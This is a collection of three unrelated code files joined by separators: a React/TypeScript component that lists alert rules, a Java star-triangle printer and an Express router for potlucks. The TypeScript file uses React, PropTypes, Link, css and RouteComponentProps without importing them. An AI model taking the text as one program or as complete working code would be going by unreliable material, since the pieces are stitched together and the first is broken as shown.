import styled from '@emotion/styled';
import {IssueAlertRule} from 'app/types/alerts';
import {SavedIncidentRule} from 'app/views/settings/incidentRules/types';
import {getDisplayName} from 'app/utils/environment';
import {t, tct} from 'app/locale';
import recreateRoute from 'app/utils/recreateRoute';
import space from 'app/styles/space';
function isIssueAlert(data: IssueAlertRule | SavedIncidentRule): data is IssueAlertRule {
return !data.hasOwnProperty('triggers');
}
type Props = {
data: IssueAlertRule | SavedIncidentRule;
type: 'issue' | 'metric';
// Is the alert rule editable?
canEdit?: boolean;
} & Pick<
RouteComponentProps<{orgId: string; projectId: string}, {}>,
'params' | 'routes' | 'location'
>;
type State = {
loading: boolean;
error: boolean;
};
class RuleRow extends React.Component<Props, State> {
static propTypes: any = {
data: PropTypes.object.isRequired,
canEdit: PropTypes.bool,
};
state = {loading: false, error: false};
renderIssueRule(data: IssueAlertRule) {
const {params, routes, location, canEdit} = this.props;
const editLink = recreateRoute(`rules/${data.id}/`, {
params,
routes,
location,
});
const environmentName = data.environment
? getDisplayName({name: data.environment})
: t('All Environments');
return (
<React.Fragment>
<RuleType>{t('Issue')}</RuleType>
<div>
{canEdit ? <RuleName to={editLink}>{data.name}</RuleName> : data.name}
<RuleDescription>
{t('Environment')}: {environmentName}
</RuleDescription>
</div>
<ConditionsWithHeader>
<MatchTypeHeader>
{tct('[matchType] of the following:', {
matchType: data.actionMatch,
})}
</MatchTypeHeader>
{data.conditions.length !== 0 && (
<Conditions>
{data.conditions.map((condition, i) => (
<div key={i}>{condition.name}</div>
))}
</Conditions>
)}
</ConditionsWithHeader>
<Actions>
{data.actions.map((action, i) => (
<Action key={i}>{action.name}</Action>
))}
</Actions>
</React.Fragment>
);
}
renderMetricRule(data: SavedIncidentRule) {
const {params, routes, location, canEdit} = this.props;
const editLink = recreateRoute(`metric-rules/${data.id}/`, {
params,
routes,
location,
});
const numberOfTriggers = data.triggers.length;
return (
<React.Fragment>
<RuleType rowSpans={numberOfTriggers}>{t('Metric')}</RuleType>
<RuleNameAndDescription rowSpans={numberOfTriggers}>
{canEdit ? <RuleName to={editLink}>{data.name}</RuleName> : data.name}
<RuleDescription />
</RuleNameAndDescription>
{numberOfTriggers !== 0 &&
data.triggers.map((trigger, i) => {
const hideBorder = i !== numberOfTriggers - 1;
return (
<React.Fragment key={i}>
<Trigger key={`trigger-${i}`} hideBorder={hideBorder}>
<StatusBadge>{trigger.label}</StatusBadge>
<TriggerDescription>
{data.aggregate}{' '}
{trigger.thresholdType === 0 ? t('above') : t('below')}{' '}
{trigger.alertThreshold}/{data.timeWindow}
{t('min')}
</TriggerDescription>
</Trigger>
<Actions key={`actions-${i}`} hideBorder={hideBorder}>
{trigger.actions?.map((action, j) => (
<Action key={j}>{action.desc}</Action>
))}
</Actions>
</React.Fragment>
);
})}
</React.Fragment>
);
}
render() {
const {data} = this.props;
return isIssueAlert(data) ? this.renderIssueRule(data) : this.renderMetricRule(data);
}
}
export default RuleRow;
type RowSpansProp = {
rowSpans?: number;
};
type HasBorderProp = {
hideBorder?: boolean;
};
const RuleType = styled('div')<RowSpansProp>`
color: ${p => p.theme.gray600};
font-size: ${p => p.theme.fontSizeSmall};
font-weight: bold;
text-transform: uppercase;
${p => p.rowSpans && `grid-row: auto / span ${p.rowSpans}`};
`;
const RuleNameAndDescription = styled('div')<RowSpansProp>`
${p => p.rowSpans && `grid-row: auto / span ${p.rowSpans}`};
`;
const RuleName = styled(Link)`
font-weight: bold;
`;
const listingCss = css`
display: grid;
grid-gap: ${space(1)};
`;
const Conditions = styled('div')`
${listingCss};
`;
const Actions = styled('div')<HasBorderProp>`
font-size: ${p => p.theme.fontSizeSmall};
${listingCss};
${p => p.hideBorder && `border-bottom: none`};
`;
const Action = styled('div')`
line-height: 14px;
`;
const ConditionsWithHeader = styled('div')`
font-size: ${p => p.theme.fontSizeSmall};
`;
const MatchTypeHeader = styled('div')`
font-weight: bold;
text-transform: uppercase;
color: ${p => p.theme.gray500};
margin-bottom: ${space(1)};
`;
const RuleDescription = styled('div')`
font-size: ${p => p.theme.fontSizeSmall};
margin: ${space(0.5)} 0;
white-space: nowrap;
`;
const Trigger = styled('div')<HasBorderProp>`
display: flex;
align-items: flex-start;
font-size: ${p => p.theme.fontSizeSmall};
${p => p.hideBorder && `border-bottom: none`};
`;
const TriggerDescription = styled('div')`
white-space: nowrap;
`;
const StatusBadge = styled('div')`
background-color: ${p => p.theme.gray300};
color: ${p => p.theme.gray700};
text-transform: uppercase;
padding: ${space(0.25)} ${space(0.5)};
font-weight: 600;
margin-right: ${space(0.5)};
border-radius: ${p => p.theme.borderRadius};
font-size: ${p => p.theme.fontSizeRelativeSmall};
`;
|
public class StarPattern {
public static void main(String[] args) {
//Rows
for (int i = 0; i < 10; i++) {
//Columns
for (int j = 0; j <= i; j++) {
System.out.print("*");
}
System.out.println();
}
}
} |
<gh_stars>0
const router = require("express").Router();
const Potlucks = require("./potluck-model");
router.get("/", async (req, res, next) => {
try {
const potlucks = await Potlucks.getAll();
res.json(potlucks);
} catch (err) {
next(err);
}
});
router.post("/", async (req, res, next) => {
try {
const newPotluck = await Potlucks.add(req.body);
res.status(201).json(newPotluck);
} catch (err) {
next(err);
}
});
module.exports = router;
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.